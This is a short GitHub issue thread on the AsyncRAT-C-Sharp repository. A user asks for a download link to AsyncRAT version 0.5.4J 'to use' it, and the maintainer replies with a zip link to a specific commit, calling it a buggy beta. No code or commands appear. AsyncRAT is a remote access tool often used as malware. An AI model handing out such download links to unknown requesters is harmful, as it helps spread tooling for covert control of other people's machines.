### ISSUE TITLE
please give me download link of AsyncRAT 0.5.4J

### ISSUE THREAD

**Issue by pkmuz1** [NYAN-x-CAT/AsyncRAT-C-Sharp#123]
i want to use AsyncRAT 0.5.4J

**Comment by NYAN-x-CAT** [comment]
It was a beta-bugged version. link:
https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/archive/7c8a4a3dffb0fcbda1bf323688eab26240cdfd0b.zip
